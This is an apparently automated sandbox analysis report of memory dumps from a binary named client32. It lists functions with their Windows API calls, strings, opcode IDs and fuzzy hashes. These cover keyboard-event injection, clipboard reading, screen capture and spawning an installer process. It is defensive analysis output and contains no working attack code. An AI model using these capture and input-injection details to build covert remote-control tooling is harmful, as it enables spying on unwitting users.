                                                                              • Instruction Fuzzy Hash: 1A12B078B40706ABE714DFA5CC81FAEB3A5AF88704F114568F616AB6C5DB70F800CB95
                                                                              Function 110663B0 Relevance: 28.3, APIs: 8, Strings: 8, Instructions: 281COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _memset
                                                                              • String ID: #$$$$CLIENTNAME$$$PROMPT$$%03d%s$..\ctl32\Connect.cpp$.prn$op - obuf <= _tsizeof (obuf)
                                                                              • API String ID: 2102423945-3087083064
                                                                              • Opcode ID: efac7ea28bf95b1601145c4618340287db0a216a3f63f558e9b358aedbbfa518
                                                                              • Instruction ID: c06d5b17c2f28b60e10424a9165a7f3540e1b0c8f26497ae356331088a011ef2
                                                                              • Opcode Fuzzy Hash: efac7ea28bf95b1601145c4618340287db0a216a3f63f558e9b358aedbbfa518
                                                                              • Instruction Fuzzy Hash: 26A12B71E0026A5BDB21CF749C917EABBEDEF45308F0441D9E99997240DB32AE45CB90
                                                                              Function 11114590 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 93keyboardsleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000002), ref: 111145D5
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetKeyState.USER32(00000090), ref: 11114600
                                                                                • Part of subcall function 11113190: DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                                • Part of subcall function 11113190: keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                              • GetKeyState.USER32(00000014), ref: 1111464C
                                                                              • Sleep.KERNEL32(00000064), ref: 1111466E
                                                                              • GetKeyState.USER32(00000091), ref: 111146A4
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: State$ControlDeviceMessagePeekSleep__wcstoi64keybd_event
                                                                              • String ID: DisableSyncCapsLock$DisableSyncNumLock$DisableSyncScrollLock$View
                                                                              • API String ID: 1459313812-451981794
                                                                              • Opcode ID: 5f6df4d1873c0af027b22fb262066da309de759a27b2956258f951e3103a83ed
                                                                              • Instruction ID: 124f8e62a6da658c60687918a6121e4bc492e5a03fd0ed5725fd2557b003e167
                                                                              • Opcode Fuzzy Hash: 5f6df4d1873c0af027b22fb262066da309de759a27b2956258f951e3103a83ed
                                                                              • Instruction Fuzzy Hash: 6131D93478074297E320DB34CD45B9AF7E5AB4470CF004829E79A5E6C9EB79B940C79A
                                                                              Function 11033320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 87clipboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsClipboardFormatAvailable.USER32(?), ref: 11033361
                                                                              • GetClipboardData.USER32(?), ref: 1103337D
                                                                              • GetClipboardFormatNameA.USER32(?,?,00000050), ref: 110333FC
                                                                              • GetLastError.KERNEL32 ref: 11033406
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 11033426
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Clipboard$Format$AvailableDataErrorGlobalLastNameUnlock
                                                                              • String ID: ..\ctl32\clipbrd.cpp$pData && pSize
                                                                              • API String ID: 1861668072-1296821031
                                                                              • Opcode ID: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                              • Instruction ID: bd08247f7f5b97daa22515b1f99226a4dce8a406111026209efe1a9e37a97f87
                                                                              • Opcode Fuzzy Hash: f2492e8139006f9da97ffff361a7bd75bee4125508335d11334c914ee87c47b7
                                                                              • Instruction Fuzzy Hash: 8121D336E1415D9FC701DFE998C1AAEF3B8EF8961AB0040A9E815DF300EF71A900CB90
                                                                              Function 11113380 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 35windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              • nc->cmd.mouse.nevents < NC_MAXEVENTS, xrefs: 111133D9
                                                                              • ..\ctl32\Remote.cpp, xrefs: 111133D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountIconicTick
                                                                              • String ID: ..\ctl32\Remote.cpp$nc->cmd.mouse.nevents < NC_MAXEVENTS
                                                                              • API String ID: 1307367305-2838568823
                                                                              • Opcode ID: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                              • Instruction ID: cb75b6c9c213d9e442ee644175f48350251445db3f236d69570c6cf200ac5b3b
                                                                              • Opcode Fuzzy Hash: fccd6ed02a63c9ea5242b78adbaa7ba576b571540b65b10685f4287bd127c7f7
                                                                              • Instruction Fuzzy Hash: 11018135AA8B528AC725CFB0C9456DAFBE4AF04359F00443DE49F86658FB24B082C70A
                                                                              Function 110C1020 Relevance: 6.1, APIs: 4, Instructions: 93windowthreadCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsIconic.USER32(000000FF), ref: 110C10AD
                                                                              • ShowWindow.USER32(000000FF,00000009,?,1105E793,00000001,00000001,?,00000000), ref: 110C10BD
                                                                              • BringWindowToTop.USER32(000000FF), ref: 110C10C7
                                                                              • GetCurrentThreadId.KERNEL32 ref: 110C10E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$BringCurrentIconicShowThread
                                                                              • String ID:
                                                                              • API String ID: 4184413098-0
                                                                              • Opcode ID: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                              • Instruction ID: 84533db14937db9444e2f7c69536c5845b28cc0232cb9748846df38ed0837754
                                                                              • Opcode Fuzzy Hash: 9cd2ccb7cdf78e839ebc1708f3911b6b440f138af10aef91ba48fa7e682de2eb
                                                                              • Instruction Fuzzy Hash: 1731CD3AA00315DBDB14DE68D48079ABBA8AF48754F1540BAFC169F246CBB5E845CFE0
                                                                              Function 11113190 Relevance: 3.1, APIs: 2, Instructions: 54keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DeviceIoControl.KERNEL32(?,00000101,?,00000001,00000000,00000000,?,00000000), ref: 111131E2
                                                                              • keybd_event.USER32(00000091,00000046,00000000,00000000), ref: 11113215
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ControlDevicekeybd_event
                                                                              • String ID:
                                                                              • API String ID: 1421710848-0
                                                                              • Opcode ID: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction ID: d69eaa5760cfcdb7a6e8037c3782fd2f7db196db4b5aaba7e7bab0ff0a721f20
                                                                              • Opcode Fuzzy Hash: 9865bf64858dfd4b5ae79e364b4789db47783bc591ded0e092dc9763c4139b7b
                                                                              • Instruction Fuzzy Hash: E4012432F55A1539F30489B99E45FE7FA2CAB40721F014278EE59AB2C8DAA09904C6A0
                                                                              Function 1101C110 Relevance: .3, Instructions: 285COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 28870f3cd85b2f504c259e844a07955800c2b4529e2f618661f80502fa488756
                                                                              • Instruction ID: 62d1cf81ed51e4e0d51e8a312bcc7b53f4bf3873e82126cba4457949b4a63457
                                                                              • Opcode Fuzzy Hash: 28870f3cd85b2f504c259e844a07955800c2b4529e2f618661f80502fa488756
                                                                              • Instruction Fuzzy Hash: 83C10EB6A50B038BD3698E68DCD07717392FFDC30CF5A4978CA425B792D6797522CA80
                                                                              Function 111640E0 Relevance: .1, Instructions: 76COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                              • Instruction ID: 58a0a8bbdc327d95f5ab9f6db34be16e1ad385e1a8784f491a618a7ca26c401e
                                                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                              • Instruction Fuzzy Hash: A511ECB77C0191C3F201C929D9B05B7FB9FDBE5321B154366D0528BD58D2A3B165D600
                                                                              Function 1103D530 Relevance: 56.4, APIs: 14, Strings: 18, Instructions: 385libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$_memset$AddressFreeLoadProcwsprintf$_malloc
                                                                              • String ID: %02x%02x%02x%02x%02x%02x$%d adapters in chain, %d adapters by size$* $3$CLTCONN.CPP$GetAdaptersInfo$IPHLPAPI.DLL$Info. Netbios macaddr=%s$Info. Set MacAddr to %s$Info. Unable to load netapi32$Info. macaddr[%d]=%s, ipaddr=%hs/%hs$ListenAddress$Netbios$TCPIP$VIRTNET$Warning. Netbios() returned x%x$netapi32.dll$pGetAdaptersInfo
                                                                              • API String ID: 2942389153-3574733319
                                                                              • Opcode ID: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
                                                                              • Instruction ID: 9380186eaa86aba5e78307d08d1cef0eec38285017acdf678952b44c5cd5fdba
                                                                              • Opcode Fuzzy Hash: a1f09aa51e896bd3823c6bcd84ba5b8c2eceb3d4fedcf053763cb51e93d6f7e9
                                                                              • Instruction Fuzzy Hash: 60E13A75D1429A9FEB17CB648C90BEEBBF96F85305F4400D9E858B7240E630AB44CF61
                                                                              Function 11128550 Relevance: 50.9, APIs: 18, Strings: 11, Instructions: 199libraryprocessloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,AB86ACF8,75BF3760,?,75BF7A80), ref: 11128597
                                                                              • GetCurrentProcess.KERNEL32 ref: 11128608
                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1112861C
                                                                              • SetLastError.KERNEL32(00000078), ref: 11128636
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1112865C
                                                                              • _memset.LIBCMT ref: 111286BA
                                                                              • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 111286FF
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11128716
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 11128730
                                                                              • CloseHandle.KERNEL32(?), ref: 11128754
                                                                              • CloseHandle.KERNEL32(?), ref: 1112875D
                                                                              • FreeLibrary.KERNEL32(?), ref: 111287AA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                                              • String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
                                                                              • API String ID: 3751713381-2378866903
                                                                              • Opcode ID: ca18b50772430f7a4c4c37d2d13f0c7706ed45a9cdc9ed65db533534a49009e2
                                                                              • Instruction ID: 28a45035b83521f7ee9a72484b737b0195934207c333fbc323246533478544ad
                                                                              • Opcode Fuzzy Hash: ca18b50772430f7a4c4c37d2d13f0c7706ed45a9cdc9ed65db533534a49009e2
                                                                              • Instruction Fuzzy Hash: 0E817AB5D01268AFDB24DFA5CDC8A99FBB9FB48304F6045EAE519A3640DB305A80CF54
                                                                              Function 110B3100 Relevance: 50.9, APIs: 23, Strings: 6, Instructions: 178filewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110B3130
                                                                              • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110B3141
                                                                              • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110B314F
                                                                              • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110B3183
                                                                              • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110B31A6
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110B31C2
                                                                              • GetDC.USER32(00000000), ref: 110B31E8
                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 110B31FC
                                                                              • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110B321F
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 110B3236
                                                                              • GetTickCount.KERNEL32 ref: 110B323F
                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110B3276
                                                                              • GetTickCount.KERNEL32 ref: 110B327F
                                                                              • GetLastError.KERNEL32(00000000), ref: 110B328E
                                                                              • GdiFlush.GDI32 ref: 110B32A2
                                                                              • SelectObject.GDI32(00000000,?), ref: 110B32AD
                                                                              • DeleteObject.GDI32(00000000), ref: 110B32B4
                                                                              • SetEvent.KERNEL32(?), ref: 110B32BE
                                                                              • DeleteDC.GDI32(00000000), ref: 110B32C8
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 110B32D4
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 110B32DE
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B32E5
                                                                              • CloseHandle.KERNEL32(00000000), ref: 110B3309
                                                                              Strings
